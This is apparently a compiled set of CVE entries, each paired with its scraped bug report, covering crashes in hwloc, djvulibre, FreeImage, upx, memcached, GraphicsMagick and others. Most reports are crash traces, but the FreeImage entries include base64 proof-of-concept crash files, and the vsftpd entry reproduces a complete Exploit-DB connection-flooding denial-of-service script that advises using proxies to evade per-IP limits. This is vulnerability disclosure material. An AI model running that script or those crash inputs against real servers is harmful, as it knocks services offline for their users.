An issue was discovered in open-mpi hwloc 2.1.0 allows attackers to cause a denial of service or other unspecified impacts via glibc-cpuset in topology-linux.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

ash1852 opened this issue

Aug 31, 2022

· 3 comments

**Comments**

Hi, I found a potential null pointer dereference bug in the project source code of hwloc, and I have shown the execution sequence of the program that may generate the bug on the graph below. The red text illustrates the steps that generate the bug, the green text represents some additional information to help understanding when the steps occur and the file path can be seen in the blue framed section.

Although the code shown is for version 2.1.0, this potential bug is still present in the current version

setsize \= CPU\_ALLOC\_SIZE(last+1);

plinux\_set \= CPU\_ALLOC(last+1);

CPU\_ZERO\_S(setsize, plinux\_set);

  
would you can help to check if this bug is true?thank you!

Hello  
Yes, there are likely many corner cases like where we don't check allocation return values. Similar issue in hwloc\_linux\_set\_tid\_cpubind(), hwloc\_linux\_find\_kernel\_nr\_cpus() and hwloc\_linux\_get\_tid\_cpubind(), hwloc\_linux\_set\_thread\_cpubind(), hwloc\_linux\_get\_thread\_cpubind().  
The (bad) rational is that other things will go wrong before this one will trigger a crash. Feel free to send a fix :)

 bgoglin changed the title A potential bug of NPD potential NULL glibc-cpuset dereferences in topology-linux.c

Aug 31, 2022

CVE-2022-47022 was assigned to this issue.

I didn't have any involvement in the assignment, posting here for visibility.

Thanks for the reminder, I forgot about this, I am pushing the fix to master and all stable branches.

bgoglin added a commit that referenced this issue

Aug 24, 2023

CVE-2022-47022: potential NULL glibc-cpuset dereferences in topology-linux.c · Issue #544 · open-mpi/hwloc

An issue was discovered IW44EncodeCodec.cpp in djvulibre 3.5.28 in allows attackers to cause a denial of service via divide by zero.

Command：c44 POC  
Result：  
gdb information：floating point exception  
Program received signal SIGFPE, Arithmetic exception.  
0x00005555555afe13 in DJVU::IWBitmap::Encode::init (this=0x5555555fb1f0, bm=..., gmask=...) at IW44EncodeCodec.cpp:1431  
1431 bconv\[i\] = max(0,min(255,i\*255/g)) - 128;  
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ REGISTERS \]──────────────────────────────────────────────────────────────────────────────────────────────────  
RAX 0x0  
RBX 0x0  
RCX 0x0  
RDX 0x0  
RDI 0x0  
RSI 0x7fffffffdfc0 ◂— 0x0  
R8 0xff  
R9 0x0  
R10 0x1  
R11 0x246  
R12 0x0  
R13 0x7fffffffe110 ◂— 0x0  
R14 0x0  
R15 0x18  
RBP 0x5555555fb2f0 —▸ 0x5555555e1ab8 —▸ 0x55555557aa50 (DJVU::GBitmap::~GBitmap()) ◂— endbr64  
RSP 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
RIP 0x5555555afe13 ◂— idiv r14d  
───────────────────────────────────────────────────────────────────────────────────────────────────\[ DISASM \]────────────────────────────────────────────────────────────────────────────────────────────────────  
► 0x5555555afe13 idiv r14d  
↓  
0x5555555afe13 idiv r14d

────────────────────────────────────────────────────────────────────────────────────────────────\[ SOURCE (CODE) \]────────────────────────────────────────────────────────────────────────────────────────────────  
In file: /home/zxq/CVE\_testing/source/djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp  
1426 signed char _buffer;  
1427 GPBuffer<signed char=""> gbuffer(buffer,w</signed>_h);  
1428 // Prepare gray level conversion table  
1429 signed char bconv\[256\];  
1430 for (i=0; i<256; i++)  
► 1431 bconv\[i\] = max(0,min(255,i_255/g)) - 128;  
1432 // Perform decomposition  
1433 // Prepare mask information  
1434 const signed char_ msk8 = 0;  
1435 int mskrowsize = 0;  
1436 GBitmap \*mask=gmask;  
────────────────────────────────────────────────────────────────────────────────────────────────────\[ STACK \]────────────────────────────────────────────────────────────────────────────────────────────────────  
00:0000│ rsp 0x7fffffffdf70 —▸ 0x7fffffffe170 —▸ 0x5555555faf50 —▸ 0x5555555e1880 —▸ 0x55555556f0e0 (DJVU::MemoryMapByteStream::~MemoryMapByteStream()) ◂— ...  
01:0008│ 0x7fffffffdf78 ◂— 0x2f8559fd8e9bfc00  
02:0010│ 0x7fffffffdf80 —▸ 0x5555555fb1f0 —▸ 0x5555555e25b8 —▸ 0x5555555afb40 (DJVU::IWBitmap::Encode::~Encode()) ◂— endbr64  
03:0018│ 0x7fffffffdf88 ◂— 0x0  
04:0020│ 0x7fffffffdf90 —▸ 0x7fffffffdfb0 —▸ 0x7fffffffdfa8 ◂— 0x0  
05:0028│ 0x7fffffffdf98 —▸ 0x7fffffffe050 —▸ 0x5555555e1b00 (DJVU::GCont::TrivTraits<1>::traits()::theTraits) ◂— 0x1  
06:0030│ 0x7fffffffdfa0 —▸ 0x55555557f820 ◂— endbr64  
07:0038│ 0x7fffffffdfa8 ◂— 0x0  
──────────────────────────────────────────────────────────────────────────────────────────────────\[ BACKTRACE \]──────────────────────────────────────────────────────────────────────────────────────────────────  
► f 0 0x5555555afe13  
f 1 0x5555555b00a4  
f 2 0x55555556ba02 main+1986  
f 3 0x7ffff79f00b3 \_\_libc\_start\_main+243  
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────  
pwndbg> pg  
Undefined command: "pg". Try "help".  
pwndbg> p g  
$1 = 0

CVE-2021-46312: DjVuLibre / Bugs / #344 Divide By Zero in djvulibre-3.5.28/libdjvu/IW44EncodeCodec.cpp

NULL pointer dereference vulnerability in FreeImage before 1.18.0 via the FreeImage_CloneTag function inFreeImageTag.cpp.

> tl;dr:  
> When Load TIFF format files, field "StripOffsets" is read from file. If the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy().

When the program Open a TIFF format file, it will be handed to the "TIFFFdOpen()" function of the 'PluginTIFF.cpp' file,  
in "TIFFFdOpen()" functions, it call "TIFFReadDirectory()" function, and it use "hack" code. So field "StripOffsets" will set nullptr sometimes.

int
TIFFReadDirectory(TIFF\* tif){
......
        if ((tif->tif\_dir.td\_compression==COMPRESSION\_OJPEG) &&
            (isTiled(tif)==0) &&
            (tif->tif\_dir.td\_nstrips==1)) {
            /\*
             \* XXX: OJPEG hack.
             \* If a) compression is OJPEG, b) it's not a tiled TIFF,
             \* and c) the number of strips is 1,
             \* then we tolerate the absence of stripoffsets tag,
             \* because, presumably, all required data is in the
             \* JpegInterchangeFormat stream.
             \*/
            TIFFSetFieldBit(tif, FIELD\_STRIPOFFSETS);
......
}

When we Load a TIFF format file, it will be handed to the "Load()" function of the 'PluginTIFF.cpp' file, it will call FreeImage\_CloneTag() with tag 'StripOffsets' finally.

FITAG \* DLL\_CALLCONV 
FreeImage\_CloneTag(FITAG \*tag) {
    if(!tag) return NULL;

    // allocate a new tag
    FITAG \*clone \= FreeImage\_CreateTag();
    if(!clone) return NULL;

    try {
        // copy the tag
        FITAGHEADER \*src\_tag \= (FITAGHEADER \*)tag\->data;
        FITAGHEADER \*dst\_tag \= (FITAGHEADER \*)clone\->data;

        // tag ID
        dst\_tag\->id \= src\_tag\->id;
        // tag key
        if(src\_tag\->key) {
            dst\_tag\->key \= (char\*)malloc((strlen(src\_tag\->key) + 1) \* sizeof(char));
            if(!dst\_tag\->key) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->key, src\_tag\->key);
        }
        // tag description
        if(src\_tag\->description) {
            dst\_tag\->description \= (char\*)malloc((strlen(src\_tag\->description) + 1) \* sizeof(char));
            if(!dst\_tag\->description) {
                throw FI\_MSG\_ERROR\_MEMORY;
            }
            strcpy(dst\_tag\->description, src\_tag\->description);
        }
        // tag data type
        dst\_tag\->type \= src\_tag\->type;
        // tag count
        dst\_tag\->count \= src\_tag\->count;
        // tag length
        dst\_tag\->length \= src\_tag\->length;
        // tag value
        switch(dst\_tag\->type) {
            case FIDT\_ASCII:
                dst\_tag\->value \= (BYTE\*)malloc((src\_tag\->length + 1) \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);
                ((BYTE\*)dst\_tag\->value)\[src\_tag\->length\] \= 0;
                break;
            default:
                dst\_tag\->value \= (BYTE\*)malloc(src\_tag\->length \* sizeof(BYTE));
                if(!dst\_tag\->value) {
                    throw FI\_MSG\_ERROR\_MEMORY;
                }
                memcpy(dst\_tag\->value, src\_tag\->value, src\_tag\->length);                    //<---- src\_tag\->value \= nullptr
                break;
        }

        return clone;

    } catch(const char \*message) {
        FreeImage\_DeleteTag(clone);
        FreeImage\_OutputMessageProc(FIF\_UNKNOWN, message);
        return NULL;
    }
}

So if the file compression is OJPEG and "StripOffsets" not exist in TIFF files, FreeImage will try to read nullptr by memcpy(). It allows an attacker to cause Denial of Service.

windbg:

ModLoad: 10000000 105ee000   D:\\temp\\\_zzz\\FreeImage.dll
ModLoad: 752b0000 752c4000   C:\\Windows\\SysWOW64\\VCRUNTIME140.dll
ModLoad: 755e0000 75643000   C:\\Windows\\SysWOW64\\WS2\_32.dll
ModLoad: 77050000 7710f000   C:\\Windows\\SysWOW64\\RPCRT4.dll
(8558.62d4): Break instruction exception \- code 80000003 (first chance)
eax\=00000000 ebx\=00000000 ecx\=cbc20000 edx\=00000000 esi\=77442044 edi\=7744260c
eip\=774e1b72 esp\=00aff42c ebp\=00aff458 iopl\=0         nv up ei pl zr na pe nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00000246
ntdll!LdrpDoDebuggerBreak+0x2b:
774e1b72 cc              int     3
0:000\> g
(8558.62d4): Access violation \- code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
\*\*\* WARNING: Unable to verify checksum for D:\\temp\\\_zzz\\FreeImage.dll
eax\=00000008 ebx\=06a8bff8 ecx\=00000002 edx\=00000008 esi\=00000000 edi\=0fd44ff8
eip\=102a6e77 esp\=00aff500 ebp\=00aff54c iopl\=0         nv up ei pl nz ac po nc
cs\=0023  ss\=002b  ds\=002b  es\=002b  fs\=0053  gs\=002b             efl\=00010212
FreeImage!memcpy+0x507:
102a6e77 8b16            mov     edx,dword ptr \[esi\]  ds:002b:00000000\=????????
0:000\> kv
 \# ChildEBP RetAddr      Args to Child              
00 00aff504 1006577c     0fd44ff8 00000000 00000008 FreeImage!memcpy+0x507 (FPO: \[3,0,2\]) (CONV: cdecl) \[d:\\agent\\\_work\\4\\s\\src\\vctools\\crt\\vcruntime\\src\\string\\i386\\memcpy.asm @ 657\] 
01 00aff54c 10003dd0     0fd3efe8 00000001 0fd32ff8 FreeImage!FreeImage\_CloneTag+0x13c
02 00aff590 1006ba21     00000001 06a87ff8 0fd36ff0 FreeImage!FreeImage\_SetMetadata+0x3c0
03 00aff5d8 1006bb17     06a87ff8 1006bccd 06a87ff8 FreeImage!tiff\_read\_geotiff\_profile+0xa91 (FPO: \[Uses EBP\] \[2,11,4\])
04 00aff634 100356a2     06a87ff8 06a63c88 00aff900 FreeImage!tiff\_read\_exif\_tags+0x47
05 00aff664 10036c8b     06a63c88 06a87ff8 06a52fc8 FreeImage!\_TIFFmemcmp+0xae2
06 00aff8ac 1000d9de     00aff900 06a52fc8 105f0700 FreeImage!\_TIFFmemcmp+0x20cb (FPO: \[5,139,3\])
07 00aff8e0 1000da60     00000012 00aff900 06a52fc8 FreeImage!FreeImage\_LoadFromHandle+0x8e (FPO: \[Uses EBP\] \[4,3,2\])
08 00aff90c 00b0107b     00000012 06a4efee 00000000 FreeImage!FreeImage\_Load+0x50 (FPO: \[3,4,2\])

TestFile:

data:image/tiff;base64,SUkqAAgAAAAFAAABAwABAAAAMDAAAAEBAwABAAAAMDAAAAMBAwABAAAABgAAAAYBAwABAAAAAAAAAB4ABAAMAAAABAAAAAAAAAAAAAAAAAA\=

CVE-2021-40264: FreeImage / Bugs / #335 A NULL pointer dereference exists in function FreeImage_CloneTag() located in PluginTIFF.cpp

Buffer Overflow vulnerability in hash_findi function in hashtbl.c in nasm 2.15rc0 allows remote attackers to cause a denial of service via crafted asm file.

Self-registration is disabled due to spam issue (mail gorcunov@gmail.com or hpa@zytor.com to create an account)

'3392644?cve=title' is not a valid bug number nor an alias to a bug.

Please press **Back** and try again.

CVE-2020-21685: Invalid Bug ID

Reachable Assertion vulnerability in upx before 4.0.0 allows attackers to cause a denial of service via crafted file passed to the the readx function.

**What's the problem (or question)?**

Assertion \`(unsigned)len <= buf->getSize()' failed in file.cpp:275

upx.out: file.cpp:275: virtual int InputFile::readx(MemBuffer\*, int): Assertion \`(unsigned)len <= buf\-\>getSize()' failed.
Program received signal SIGABRT, Aborted.

    pwndbg> bt
    #0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
    #1  0x00007ffff7bcc859 in __GI_abort () at abort.c:79
    #2  0x00007ffff7bcc729 in __assert_fail_base (fmt=0x7ffff7d62588 "%s%s%s:%u: %s%sAssertion `%s' failed.\n%n", assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=<optimized out>) at assert.c:92
    #3  0x00007ffff7bddf36 in __GI___assert_fail (assertion=0x5555555f5618 "(unsigned)len <= buf->getSize()", file=0x5555557067b1 "file.cpp", line=275, function=0x5555555f5638 "virtual int InputFile::readx(MemBuffer*, int)") at assert.c:101
    #4  0x000055555558a280 in InputFile::readx(MemBuffer*, int) ()
    #5  0x00005555555c5969 in PackUnix::packExtent(PackUnix::Extent const&, Filter*, OutputFile*, unsigned int, unsigned int) ()
    #6  0x00005555555b4fb2 in PackMachBase<N_Mach::MachClass_64<N_BELE_CTP::LEPolicy> >::pack2(OutputFile*, Filter&) ()
    #7  0x00005555555c4d98 in PackUnix::pack(OutputFile*) ()
    #8  0x00005555555d6028 in Packer::doPack(OutputFile*) ()
    #9  0x00005555555eacd3 in do_one_file(char const*, char*) ()
    #10 0x00005555555eaf8f in do_files(int, int, char**) ()
    #11 0x00005555555973c7 in upx_main(int, char**) ()
    #12 0x000055555557c4e2 in main ()
    #13 0x00007ffff7bce0b3 in __libc_start_main (main=0x55555557c3e0 <main>, argc=2, argv=0x7fffffffe208, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe1f8) at ../csu/libc-start.c:308
    #14 0x000055555557c5fe in _start ()
    

**What should have happened?**

No crash.

**Do you have an idea for a solution?**

No.

**How can we reproduce the issue?**

1.make  
2../src/upx.out ./poc  
poc.zip

**Please tell us details about your environment.**

*   ./upx.out --version  
    upx 4.0.0-git-5d1347a359bb  
    UCL data compression library 1.03  
    zlib data compression library 1.2.11  
    LZMA SDK version 4.43
*   Host Operating System and version: Ubuntu 20.04 focal
*   Host CPU architecture: AMD E  
    poc.zip  
    PYC 7742 64-Core @ 16x 2.25GHz
*   Target Operating System and version: Ubuntu 20.04 focal
*   Target CPU architecture: AMD EPYC 7742 64-Core @ 16x 2.25GHz

CVE-2021-46179: Assertion `(unsigned)len <= buf->getSize()' failed in file.cpp:275 · Issue #545 · upx/upx

VSFTPD 3.0.3 allows attackers to cause a denial of service due to limited number of connections allowed.

**vsftpd 3.0.3 - Remote Denial of Service**

    # Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
    # Date: 22-03-2021
    # Exploit Author: xynmaps
    # Vendor Homepage: https://security.appspot.com/vsftpd.html
    # Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
    # Version: 3.0.3
    # Tested on: Parrot Security OS 5.9.0
    
    #-------------------------------#
    
    #encoding=utf8
    #__author__ = XYN/Dump/NSKB3
    #VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
    """
    VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
    you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
    (if it's limited, just run this script from different proxies using proxychains, and it will work)
    """
    
    import socket
    import sys
    import threading
    import subprocess
    import time
    
    banner = """
    ._________________.
    |     VS-FTPD     |
    |      D o S      |
    |_________________|
    |By XYN/DUMP/NSKB3|
    |_|_____________|_|
    |_|_|_|_____|_|_|_|
    |_|_|_|_|_|_|_|_|_|
    
    """
    usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
    
    def test(t,p):
    	s = socket.socket()
    	s.settimeout(10)
    	try:
    		s.connect((t, p))
    		response = s.recv(65535)
    		s.close()
    		return 0
    	except socket.error:
    		print("Port {} is not open, please specify a port that is open.".format(p))
    		sys.exit()
    def attack(targ, po, id):
    	try:
    		subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    		#print("Worker {} running".format(id))
    	except OSError: pass
    def main():
    	global target, port, start
    	print banner
    	try:
    		target = sys.argv[1]
    	except:
    		print usage
    		sys.exit()
    	try:
    		port = int(sys.argv[2])
    	except:
    		port = 21
    	try:
    		conns = int(sys.argv[3])
    	except:
    		conns = 50
    	print("[!] Testing if {0}:{1} is open".format(target, port))
    	test(target, port)
    	print("[+] Port {} open, starting attack...".format(port))
    	time.sleep(2)
    	print("[+] Attack started on {0}:{1}!".format(target, port))
    	def loop(target, port, conns):
    		global start
    		threading.Thread(target=timer).start()
    		while 1:
    			for i in range(1, conns + 3):
    				t = threading.Thread(target=attack, args=(target,port,i,))
    				t.start()
    				if i > conns + 2:
    					t.join()
    					break
    					loop()
    
    	t = threading.Thread(target=loop, args=(target, port, conns,))
    	t.start()
    
    def timer():
            start = time.time()
            while 1:
                    if start < time.time() + float(900): pass
                    else:
                            subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                            t = threading.Thread(target=loop, args=(target, port,))
    			t.start()
                            break
    
    main()

CVE-2021-30047: OffSec’s Exploit Database Archive

Memcached 1.6.0 before 1.6.3 allows remote attackers to cause a denial of service (daemon crash) via a crafted meta command.

memcached maintainer,

I found a NULL pointer reference bug in code of memcached, which could conduct DoS by remote artificial command.

The affected memcached version: >1.6.0.

The bug location is at file: memcached.c, detailed information as the following:

In the function "process\_mget\_command", the local variable "errstr" is defined as a char\*, which is not initialized.  

In certain condition, the function "\_meta\_flag\_preparse" is called in "process\_mget\_command", and the address of "errstr" is the 4th param.  
In the function "\_meta\_flag\_preparse", there is chances that the "\*errstr" is not initialized while command is "F" or "S".  

then, out\_errstring->out\_string->strlen referencing a NULL pointer, conduct a crash.

BR  
Zhibin

CVE-2020-22570: NULL pointer reference conduct DoS · Issue #636 · memcached/memcached

A stack exhaustion issue was discovered in FreeImage before 1.18.0 via the Validate function in PluginRAW.cpp.

> tl;dr:  
> When Load RIFF format files, "size" is read from file. FreeImage seek file pos by "size", and function Validate will call LibRaw::open\_datastream with LibRaw\_freeimage\_datastream, it will call to LibRaw::parse\_riff. If "size" is a negative number(>0x7ffffffff), FreeImage will call LibRaw::parse\_riff function by itself, it eventually causing the stack to be filled.

When the program reads a RIFF format file, it will call to the Validate function of the 'PluginRAW.cpp' file , to validata format.

In Validate function, it will use LibRaw\_freeimage\_datastream to call LibRaw::open\_datastream

static BOOL DLL\_CALLCONV
Validate(FreeImageIO \*io, fi\_handle handle) {           //<---- io is LibRaw\_freeimage\_datastream
......
    // no magic signature : we need to open the file (it will take more time to identify it)
    // do not declare RawProcessor on the stack as it may be huge (300 KB)
    {
        LibRaw \*RawProcessor \= new(std::nothrow) LibRaw;

        if(RawProcessor) {
            BOOL bSuccess \= TRUE;

            // wrap the input datastream
            LibRaw\_freeimage\_datastream datastream(io, handle);

            // open the datastream
            if(RawProcessor->open\_datastream(&datastream) != LIBRAW\_SUCCESS) {     //<---- call LibRaw::open\_datastream
                bSuccess \= FALSE;   // LibRaw : failed to open input stream (unknown format)
            }

            // clean-up internal memory allocations
            RawProcessor-\>recycle();
            delete RawProcessor;

            return bSuccess;
        }
    }

    return FALSE;
}

And will call to LibRaw::parse\_riff function if file start with "RIFF".

FreeImaged.dll!LibRaw::parse\_riff()
FreeImaged.dll!LibRaw::identify()
FreeImaged.dll!LibRaw::open\_datastream(LibRaw\_abstract\_datastream \* stream)
FreeImaged.dll!Validate(FreeImageIO \* io, void \* handle)
FreeImaged.dll!FreeImage\_ValidateFIF(FREE\_IMAGE\_FORMAT fif, FreeImageIO \* io, void \* handle)
FreeImaged.dll!FreeImage\_GetFileTypeFromHandle(FreeImageIO \* io, void \* handle, int size)
FreeImaged.dll!FreeImage\_GetFileType(const char \* filename, int size)

In LibRaw::parse\_riff function, it call itslef by variable "tag". And the "tag" is read from file.

void LibRaw::parse\_riff()
{
  unsigned i, size, end;
  char tag\[4\], date\[64\], month\[64\];
  static const char mon\[12\]\[4\] \= {"Jan", "Feb", "Mar", "Apr", "May", "Jun",
                                  "Jul", "Aug", "Sep", "Oct", "Nov", "Dec"};
  struct tm t;

  order \= 0x4949;
  fread(tag, 4, 1, ifp);
  size \= get4();                                //<---- size read from file
  end \= ftell(ifp) + size;
  if (!memcmp(tag, "RIFF", 4) || !memcmp(tag, "LIST", 4))
  {
    int maxloop \= 1000;
    get4();
    while (ftell(ifp) + 7 < end && !feof(ifp) && maxloop\--)
      parse\_riff();                             //<---- call itself
  }
.......
  }
  else
    fseek(ifp, size, SEEK\_CUR);                 //<---- seek pos by size
}

function get4() just read four bytes.

unsigned LibRaw::get4()
{
  uchar str\[4\] \= {0xff, 0xff, 0xff, 0xff};
  fread(str, 1, 4, ifp);
  return sget4(str);
}

\_\_int64 is file default variable type at LibRaw\_bigfile\_buffered\_datastream in "libraw\_datastream.h"

class DllDef LibRaw\_bigfile\_buffered\_datastream : public LibRaw\_abstract\_datastream
{
public:
......
    virtual INT64 tell();
    virtual INT64 size() { return \_fsize; }
......
protected:
    INT64   readAt(void \*ptr, size\_t size, INT64 off);
......
    INT64 \_fsize;
    INT64 \_fpos; /\* current file position; current buffer start position \*/
......
};

But long is file default variable type at "LibRaw\_freeimage\_datastream" in FreeImageIO.cpp

unsigned DLL\_CALLCONV 
\_ReadProc(void \*buffer, unsigned size, unsigned count, fi\_handle handle) {
    return (unsigned)fread(buffer, size, count, (FILE \*)handle);
}

unsigned DLL\_CALLCONV 
\_WriteProc(void \*buffer, unsigned size, unsigned count, fi\_handle handle) {
    return (unsigned)fwrite(buffer, size, count, (FILE \*)handle);
}

int DLL\_CALLCONV
\_SeekProc(fi\_handle handle, long offset, int origin) {
    return fseek((FILE \*)handle, offset, origin);
}

long DLL\_CALLCONV
\_TellProc(fi\_handle handle) {
    return ftell((FILE \*)handle);
}

So if we let "size" to a negative number, the the file cursor pos could go back to begining of function.  
LibRaw::parse\_riff will call function by itself, it eventually causing the stack to be filled. An attacker can reach a remote denial of service attack by sending a specially constructed file.

windbg:

ModLoad: 00000001\`80000000 00000001\`80a65000   D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Dist\\x64\\FreeImaged.dll
ModLoad: 00007ffa\`f4430000 00007ffa\`f44bd000   C:\\Windows\\SYSTEM32\\MSVCP140.dll
ModLoad: 00007ffb\`5eda0000 00007ffb\`5edac000   C:\\Windows\\SYSTEM32\\VCRUNTIME140\_1.dll
ModLoad: 00007ffb\`7de50000 00007ffb\`7debb000   C:\\Windows\\System32\\WS2\_32.dll
ModLoad: 00007ffb\`69a60000 00007ffb\`69a7b000   C:\\Windows\\SYSTEM32\\VCRUNTIME140.dll
ModLoad: 00007ffb\`39170000 00007ffb\`391a7000   C:\\Windows\\SYSTEM32\\VCOMP140D.DLL
ModLoad: 00007ffb\`7dd20000 00007ffb\`7de4a000   C:\\Windows\\System32\\RPCRT4.dll
(4460.8c84): Break instruction exception \- code 80000003 (first chance)
ntdll!LdrpDoDebuggerBreak+0x30:
00007ffb\`7ed80770 cc              int     3
0:000\> g
(4460.8c84): Stack overflow \- code c00000fd (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
FreeImaged!\_\_crt\_stdio\_stream::has\_any\_buffer+0x13:
00000001\`8058e103 e808000000      call    FreeImaged!\_\_crt\_stdio\_stream::has\_any\_of (00000001\`8058e110)
0:000\> k
 # Child\-SP          RetAddr               Call Site
00 000000a9\`09a03ff0 00000001\`805a2947     FreeImaged!\_\_crt\_stdio\_stream::has\_any\_buffer+0x13 \[minkernel\\crts\\ucrt\\inc\\corecrt\_internal\_stdio.h @ 221\] 
01 000000a9\`09a04020 00000001\`805a31c0     FreeImaged!\_fread\_nolock\_s+0x2b7 \[minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fread.cpp @ 93\] 
02 000000a9\`09a04100 00000001\`805a307d     FreeImaged!fread\_s+0x130 \[minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fread.cpp @ 56\] 
03 000000a9\`09a04150 00000001\`8000f564     FreeImaged!fread+0x3d \[minkernel\\crts\\ucrt\\src\\appcrt\\stdio\\fread.cpp @ 240\] 
04 000000a9\`09a04190 00000001\`8005192b     FreeImaged!\_ReadProc+0x34 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\FreeImage\\FreeImageIO.cpp @ 33\] 
05 000000a9\`09a041c0 00000001\`802f1bf1     FreeImaged!LibRaw\_freeimage\_datastream::read+0x3b \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\FreeImage\\PluginRAW.cpp @ 67\] 
06 000000a9\`09a041f0 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x81 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 256\] 
07 000000a9\`09a043b0 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 
08 000000a9\`09a04570 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 
09 000000a9\`09a04730 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 
0a 000000a9\`09a048f0 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 
0b 000000a9\`09a04ab0 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 
0c 000000a9\`09a04c70 00000001\`802f1d11     FreeImaged!LibRaw::parse\_riff+0x1a1 \[D:\\coding\\FreeImage\\freeimage\-svn\-r1889\\FreeImage\\trunk\\Source\\LibRawLite\\src\\metadata\\misc\_parsers.cpp @ 263\] 

TestFile:

data:image/raw;base64,UklGRiAAAAAAAAAAMHg3OQAAAAAwMDAw5P///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\==

CVE-2021-40262: FreeImage / Bugs / #338 A stack buff overflower in function Validate() located in PluginRAW.cpp

Buffer Overflow vulnerability in WritePCXImage function in pcx.c in GraphicsMagick 1.4 allows remote attackers to cause a denial of service via converting of crafted image file to pcx format.

Hi, I found a heap-buffer-overflow in WritePCXImage at pcx.c:1255  
I tested it in GraphicsMagick 1.4  
how to reproduce :

ASAN LOG

\==14178\==ERROR: AddressSanitizer: heap\-buffer\-overflow on address 0x6030000000c0 at pc 0x0000028f29c0 bp 0x7ffec5056070 sp 0x7ffec5056068
WRITE of size 1 at 0x6030000000c0 thread T0
    #0 0x28f29bf in WritePCXImage /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1255:17
    #1 0x8e5c7e in WriteImage /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2245:14
    #2 0x8eac18 in WriteImages /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2404:21
    #3 0x615be6 in ConvertImageCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:6135:11
    #4 0x72e875 in MagickCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:8880:17
    #5 0x810c5c in GMCommandSingle /home/suhwan/project/graphicsmagick\-code/magick/command.c:17412:10
    #6 0x80ba1e in GMCommand /home/suhwan/project/graphicsmagick\-code/magick/command.c:17465:16
    #7 0x7ff6e5aa2b96 in \_\_libc\_start\_main (/lib/x86\_64\-linux\-gnu/libc.so.6+0x21b96)
    #8 0x424239 in \_start (/home/suhwan/project/fuzz\-input\-validate/test/bin/gm+0x424239)

0x6030000000c0 is located 0 bytes to the right of 32\-byte region \[0x6030000000a0,0x6030000000c0)
allocated by thread T0 here:
    #0 0x4cc083 in \_\_interceptor\_malloc /tmp/final/llvm.src/projects/compiler\-rt/lib/asan/asan\_malloc\_linux.cc:146:3
    #1 0x28ddf2c in WritePCXImage /home/suhwan/project/graphicsmagick\-code/coders/pcx.c:1172:16
    #2 0x8e5c7e in WriteImage /home/suhwan/project/graphicsmagick\-code/magick/constitute.c:2245:14
